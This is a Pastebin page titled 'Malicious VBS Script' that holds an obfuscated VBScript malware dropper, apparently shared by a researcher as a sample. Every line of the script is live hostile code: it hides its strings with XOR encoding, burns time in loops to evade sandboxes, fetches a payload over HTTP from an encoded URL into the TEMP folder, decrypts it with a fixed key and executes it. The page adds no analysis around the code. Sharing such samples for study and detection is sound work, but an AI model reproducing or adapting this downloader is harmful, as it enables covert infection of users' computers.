Advertisement
dynamoo

Malicious VBS Script

Feb 17th, 2016
471
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Dim NvBbjLvaPhjk,OW5F8Xy6bno
  2. sub Qy8MLTj()
  3. LtOt889jkOkTpN=Second(16)
  4. Dim LWD6xXM78lMm,INDKnxORfbqF3
  5. BuGkcKTmyRe5jP=Second(20)
  6. dO WhilE LWD6xXM78lMm<>1
  7. INDKnxORfbqF3=INDKnxORfbqF3+1
  8. LooP
  9. Oo9eTEL=Second(72)
  10. End Sub
  11. W3E53kMDU=Second(67)
  12. XsJcEhaX
  13. Function Qu4DoCs0TbMe(OIj6aGz3r,SemfKVtstZH6B2)
  14. BWfL=Second(78)
  15. Qu4DoCs0TbMe=(OIj6aGz3r anD NOt SemfKVtstZH6B2)oR(nOt OIj6aGz3r aND SemfKVtstZH6B2)
  16. YYOCmA186bT=Second(52)
  17. End Function
  18. Sub AJr4qOS()
  19. UNTLCL84LdAIwI=Second(66)
  20. On Error Resume Next
  21. XcetMrOfKIoBFDhCG=Second(83)
  22. dim BmJgo9cefTBmGjWmV,UgR1ZLDeaSDnjI,GVTP18OygivIPpx,XrJe79vS
  23. WyTyvUXJc98TJ8r=Second(21)
  24. XrJe79vS="AsWN"
  25. BACUjf=Second(76)
  26. BmJgo9cefTBmGjWmV=Tkii81aBkqaNOqzB6("3004450674775F460139761D58153C37035E103A76135E1B","NXp1v")
  27. OLnKWDCFD69E=Second(58)
  28. SeT UgR1ZLDeaSDnjI=cReAteoBjEcT(Tkii81aBkqaNOqzB6("3E3E2D331C2421270779160C3F1F1A1523",XrJe79vS))
  29. Eiv0YooOxcF=Second(8)
  30. UgR1ZLDeaSDnjI.oPeN Tkii81aBkqaNOqzB6("110733","VVBghRWLrk1eGeiz8"),BmJgo9cefTBmGjWmV,0
  31. LHmVEXZGks=Second(18)
  32. UgR1ZLDeaSDnjI.SeTREQueSTHeaDEr Tkii81aBkqaNOqzB6("2633073534","QtRiR"),Tkii81aBkqaNOqzB6("17344506470A710166","BuM1c47C0KGrz18")
  33. Sy6OUOYAt6aimecyH=Second(89)
  34. UgR1ZLDeaSDnjI.SenD()
  35. PZ0KfDYS7oz=Second(51)
  36. If UgR1ZLDeaSDnjI.STATUsTeXT<>Tkii81aBkqaNOqzB6("230238130E59266775032A035D3F23","WscJgg8JG6lDw8Q") THeN Qy8MLTj
  37. QJ2uLOooBQu3X4=Second(26)
  38. End Sub
  39. Sub NymvPjZ()
  40. DoK1LWWPw=Second(38)
  41. Dim ASg4iHC4J2c,RIUxK57PMTzkjS
  42. RIUxK57PMTzkjS=NvBbjLvaPhjk & BbD7Z & Tkii81aBkqaNOqzB6("68101515","NFump42Xk")
  43. Fk5vWJ1n=Second(69)
  44. D5VVeYcpEKn3N NvBbjLvaPhjk,RIUxK57PMTzkjS
  45. QX0CpW6zpoI=Second(22)
  46. H5t548lhYv74(4)
  47. RlZCLHsKuI0d=Second(62)
  48. ASg4iHC4J2c="HsEcbirtW"
  49. VXtqKrULIq=Second(14)
  50. cREaTEoBJeCt(Tkii81aBkqaNOqzB6("24160010000200791B1B200F0E",ASg4iHC4J2c)).RUn """" & RIUxK57PMTzkjS & """"
  51. CI1bImqlZC=Second(81)
  52. End sub
  53. Function BbD7Z()
  54. DgSEG0xA=Second(57)
  55. BbD7Z=SEcond(Time)
  56. A0gM9WCPfe=Second(56)
  57. End Function
  58. Sub Tn5yV22Pck98Bt(WzuHIPsTNUvg)
  59. Uh2Z3Bl2=Second(98)
  60. Dim RyD,D7WLnskP
  61. Y4bimGH=Second(70)
  62. D7WLnskP="Iyrp7T1oaT7"
  63. AuVaD=Second(83)
  64. sET RyD=CREAtEobJEcT(Tkii81aBkqaNOqzB6("38363F73161F3C1526522814",D7WLnskP))
  65. IEvFkqrFWNd7ZeU=Second(49)
  66. RyD.typE=1
  67. PVvfoNU=Second(43)
  68. RyD.oPEn
  69. UEmdn=Second(57)
  70. RyD.WRIte WzuHIPsTNUvg
  71. MtTHhXiMUNv6m7=Second(13)
  72. RyD.SAveTOfIlE NvBbjLvaPhjk,2
  73. RzY4vDzewhF3=Second(90)
  74. Set RyD=nothInG
  75. C0BuyCgM6y=Second(33)
  76. NymvPjZ
  77. I2vbubfGG2Ly8RKfI=Second(63)
  78. End Sub
  79. sub DdVh()
  80. JmxBbmvcWAHf2D=Second(38)
  81. On Error Resume Next
  82. B2tRhqIH=Second(54)
  83. FrB7D4Q8629mzFE 1,23
  84. XC0ClC1Nzc0=Second(75)
  85. PzQC1niUytfW6=Second(22)
  86. End Sub
  87. Function Tkii81aBkqaNOqzB6(WAmuWrfUizB,TlZPOJ1Wpi)
  88. R99Ofi4RjMP8=Second(5)
  89. Dim O6PeArEgF,GhSR6u83,Ser3tDBCPHUzQftM
  90. XdLhZs5HeRJL=Second(23)
  91. fOR O6PeArEgF=1 To (lEn(WAmuWrfUizB)/2)
  92. GhSR6u83=(CHrW((9.5 + 339 + 9.5 - 339 + 9.5 + 339 + 9.5 - 339))&cHrw((18 + 215 + 18 - 215 + 18 + 215 + 18 - 215))&(mId(WAmuWrfUizB,(O6PeArEgF+O6PeArEgF)-1,2)))
  93. Ser3tDBCPHUzQftM=(AscW(mID(TlZPOJ1Wpi,((O6PeArEgF MOd Len(TlZPOJ1Wpi))+1),1)))
  94. Tkii81aBkqaNOqzB6=Tkii81aBkqaNOqzB6+ChR(Qu4DoCs0TbMe(GhSR6u83,Ser3tDBCPHUzQftM))
  95. NeXt
  96. HSbDsk=Second(71)
  97. End Function
  98. sub YjwrziQkKqgQ()
  99. T7kytHw=Second(32)
  100. Dim ByxaWy, NsuKzYr5MN
  101. For ByxaWy = 48 To 8000673
  102. NsuKzYr5MN = UQ6EW6CtW9 + 42 + 24 + 51
  103. Next
  104. PVEC7mYrH=Second(6)
  105. End Sub
  106. Sub H5t548lhYv74(KJuponW0UT82CaSh)
  107. Kwv5qeL76R=Second(82)
  108. Dim Gf7Cc
  109. SpQEHwjbwz=Second(6)
  110. Gf7Cc=TIMEr+KJuponW0UT82CaSh
  111. dO WHIle tIMER<Gf7Cc
  112. Loop
  113. NXSlh3OLv=Second(92)
  114. End Sub
  115. Function D5VVeYcpEKn3N(GTj0mbsOV3AJSPna,K614klYioX)
  116. UHOlBJucge=Second(17)
  117. Dim YnJoeq47WjqvQr8E,LTc1SisV5NL,K63xC79X3UA,XYDH1in9i,QsCd6ZzyGnXaWBi,NeBschTT(9)
  118. KSTKl0XJM=Second(3)
  119. NeBschTT(0)=104
  120. NeBschTT(1)=119
  121. NeBschTT(2)=102
  122. NeBschTT(3)=52
  123. NeBschTT(4)=49
  124. NeBschTT(5)=107
  125. NeBschTT(6)=106
  126. NeBschTT(7)=57
  127. NeBschTT(8)=115
  128. NeBschTT(9)=68
  129. OjB2PA=Second(62)
  130. SeT LTc1SisV5NL =CreAteOBjeCT(Tkii81aBkqaNOqzB6("0754460F061D0B23327A715D0A133A1B3E21315A7B041C0C0139", "UT74fvibM"))
  131. IMUp2NQ7U=Second(95)
  132. sET K63xC79X3UA=LTc1SisV5NL.getFILE(GTj0mbsOV3AJSPna)
  133. VPIL=Second(32)
  134. SeT QsCd6ZzyGnXaWBi=K63xC79X3UA.OPEnASTExtSTREam(1,0)
  135. R9tf5Y7su1d=Second(41)
  136. sEt XYDH1in9i=LTc1SisV5NL.CReATEtEXTfIlE(K614klYioX,1,0)
  137. XLiBl4=Second(78)
  138. YnJoeq47WjqvQr8E=0
  139. I3kPO3vBRPR1=Second(66)
  140. dO UntiL QsCd6ZzyGnXaWBi.ATENDoFsTrEAM
  141. YnJoeq47WjqvQr8E=(YnJoeq47WjqvQr8E+1)\10
  142. XYDH1in9i.WrItE CHr(Qu4DoCs0TbMe(aSC(QsCd6ZzyGnXaWBi.ReAd(1)),NeBschTT(YnJoeq47WjqvQr8E)))
  143. LOoP
  144. JQfTb3sm87sWErfP=Second(91)
  145. XYDH1in9i.CLoSE
  146. CvIMH2N3kP=Second(24)
  147. QsCd6ZzyGnXaWBi.CloSE
  148. Adx79m68zQMwBxoh=Second(91)
  149. SeT QsCd6ZzyGnXaWBi=NotHinG
  150. EsrPx=Second(9)
  151. Set K63xC79X3UA=NOTHINg
  152. DUi2bLYjBdnr=Second(7)
  153. SEt XYDH1in9i=NOThiNg
  154. LknbMMyC=Second(29)
  155. Set LTc1SisV5NL=nOThiNG
  156. CeKEf5Ww=Second(93)
  157. End Function
  158. Sub VWHrWTpYh()
  159. Xf5RLhXlb=Second(89)
  160. DdVh
  161. Dim YwLNFvxsSM,GnJ6LiXN9wd0SfjF,GvsN182csj,IpY,Gj93XWWOXwbeNo7z
  162. G6ZX=Second(36)
  163. On Error Resume Next
  164. HnV=Second(86)
  165. GvsN182csj="BMkGwftOMoLGM"
  166. QJIern34ZF4Bbn=Second(86)
  167. sEt YwLNFvxsSM=crEaTeoBjEcT(Tkii81aBkqaNOqzB6("1A3824050F043B633C2422212E",GvsN182csj))
  168. LgfTj3sNmDf=Second(2)
  169. YjwrziQkKqgQ
  170. TdA4qsiuNEU8=Second(55)
  171. AJr4qOS
  172. AIQoOaZdO7fKh3F=Second(92)
  173. NvBbjLvaPhjk=YwLNFvxsSM.expAnDEnvIrOnMEnTstriNgs(Tkii81aBkqaNOqzB6("4220281F162A13207D","KgAXor"))&"\"& BbD7Z & BbD7Z
  174. BsVN=Second(14)
  175. IpY="JEOCo3W8AOaw"
  176. WBrCAmDUka=Second(12)
  177. sET GnJ6LiXN9wd0SfjF=CreaTeobjECt(Tkii81aBkqaNOqzB6("0826201D5C2457273B4F2F070907173B63",IpY))
  178. MB4AnX8sHZiXkk=Second(76)
  179. GnJ6LiXN9wd0SfjF.oPEN Tkii81aBkqaNOqzB6("767415","Y11AL"),Tkii81aBkqaNOqzB6("393E2106686479060E1E66352F261F35257B18540D277F293A1B7D26310257033836751A39073325450A04121D1B212310006B","HQJUvRKVqyi") & BbD7Z,0
  180. QHXFcFYixQtJkru=Second(83)
  181. GnJ6LiXN9wd0SfjF.SETreQueStHeaDER Tkii81aBkqaNOqzB6("22281F2417","XpIqCr1"),Tkii81aBkqaNOqzB6("0D17192D30525F5E71715C43","ConmH")
  182. R1Fi9rIe02nPgY0r=Second(97)
  183. GnJ6LiXN9wd0SfjF.seNd()
  184. IEqs6tmVUSQ=Second(52)
  185. if GnJ6LiXN9wd0SfjF.staTUSteXT=Tkii81aBkqaNOqzB6("630E1C3D1E282B6A2E2B0C18571B3E","J3onIwIGJmDbl2u") then
  186. A01iypEJd=Second(10)
  187. YjwrziQkKqgQ
  188. R9AI2IHRkHli=Second(4)
  189. H5t548lhYv74(4)
  190. K6ZuqcJ5KOMdJTJ3=Second(67)
  191. Tn5yV22Pck98Bt GnJ6LiXN9wd0SfjF.rEspoNSeBOdY
  192. GKumkpaO9tCsjTWu=Second(23)
  193. H6BKPWKwfepile=Second(36)
  194. end if
  195. DwBYeOzyX5C=Second(18)
  196. End Sub
  197. sub XsJcEhaX()
  198. RvRqiz0lR4=Second(84)
  199. Dim QEdQvycjgQ5Q,GJWFOhXrpsoLNLTM,ItgCqYy1wHfHKsmO
  200. XlUpvFcrjFVdOvJs=Second(36)
  201. QEdQvycjgQ5Q=99829964:GJWFOhXrpsoLNLTM=0:ItgCqYy1wHfHKsmO=0
  202. OLWdqIX6X2KY=Second(94)
  203. FOr GJWFOhXrpsoLNLTM=1 To QEdQvycjgQ5Q
  204. ItgCqYy1wHfHKsmO=ItgCqYy1wHfHKsmO+1
  205. Next
  206. GIANUI52LWN5rirn=Second(50)
  207. iF ItgCqYy1wHfHKsmO=QEdQvycjgQ5Q Then
  208. JWA7EwpjwkSYWy1=Second(78)
  209. H5t548lhYv74(4)
  210. XNtkMbX63TaaIvy=Second(97)
  211. VWHrWTpYh
  212. N1AemqxRYccoa=Second(55)
  213. ELse
  214. IYP6EZHw=Second(84)
  215. If CByte(10)=True Then NTI8xj=9565
  216. CreateObject "KQ88xO47qS0I5QEU4","XDzEhC1OuqI"
  217. LSyoDfa=UCase("30")
  218. If CBool(35)=True Then LYqTSTZaBPsQ=74
  219. Atn 29
  220. NUbNdHKNS2S=EOF
  221. OaS1s5F=Fix(38)
  222. GetObject 64,58
  223. DateSerial 25,50,52
  224. Year 68
  225. JGk41QMnjLZqbJAt0YVJWxfL=Second(52)
  226. EnD If
  227. Hu1bg=Second(5)
  228. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement